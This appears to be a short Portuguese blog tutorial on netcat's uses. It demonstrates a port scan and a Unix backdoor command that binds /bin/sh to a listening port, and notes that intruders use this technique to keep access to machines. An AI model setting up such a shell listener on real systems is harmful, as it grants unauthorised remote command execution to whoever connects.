open core »

Netcat - O canivete suíço das redes

O netcat é uma ferramenta de rede open source bastante útil. O seu principal propósito é "ler" e "escrever" dados em ligações TCP ou UDP. No entanto com esta simples funcionalidade é possível obter inúmeras utilidades.

Neste post não vou analisar ao pormenor o netcat, mas sim mostrar o que mais relevante se poderá fazer com o mesmo. Para começar, o netcat pode ser um port scanner. Para fazer o scanning de portos abertos basta usar com os seguintes argumentos:

nc -v -w2 -z 127.0.0.1 1-1024

Com este comando podemos fazer um port scan ao localhost (127.0.0.1). O argumento -v indica que o netcat deverá explicitar todas as acções que se encontra a executar (verbose mode). O -w indica o número de segundos que deverá esperar até obter resposta, caso não obtenha irá ser assumido que o porto não tem nenhum serviço à escuta de ligações. O -z indica que o netcat não deverá enviar quaisquer dados para o porto, por motivos óbvios. Segue-se o endereço ip onde é necessário fazer o scan e depois segue-se o intervalo das portas a scanear.

O netcat também pode ser usado como um backdoor. Esta técnica é bastante utilizada por invasores de sistemas baseados em Unix de modo a poderem garantir acesso futuro às máquinas. Para criarem um backdoor basta chamarem o netcat com os seguintes argumentos:

nc -l -p 5000 -e /bin/sh

O -l indica o netcat para ficar à espera de ligações (listen mode). O -p especifica o número da porta, neste caso 5000. E o -e é o argumento mais importante e especifica o programa que deverá ser executado após ligação com sucesso, neste caso uma shell.

Para estabelecer uma ligação a uma máquina que corre o comando em cima mostrado bastaria usar igualmente o netcat do seguinte modo:

nc -v <endereço ip> 5000

Aqui o comando é mais mais simples, apenas se indica o verbose mode, o IP da máquina a ligar e o porto onde é possível estabelecer a ligação.

Como podem ver este simples programa tem inúmeras utilidades, e eu apenas mostrei 3 delas. Para mais informações no uso desta poderosa ferramenta consultem a homepage do netcat.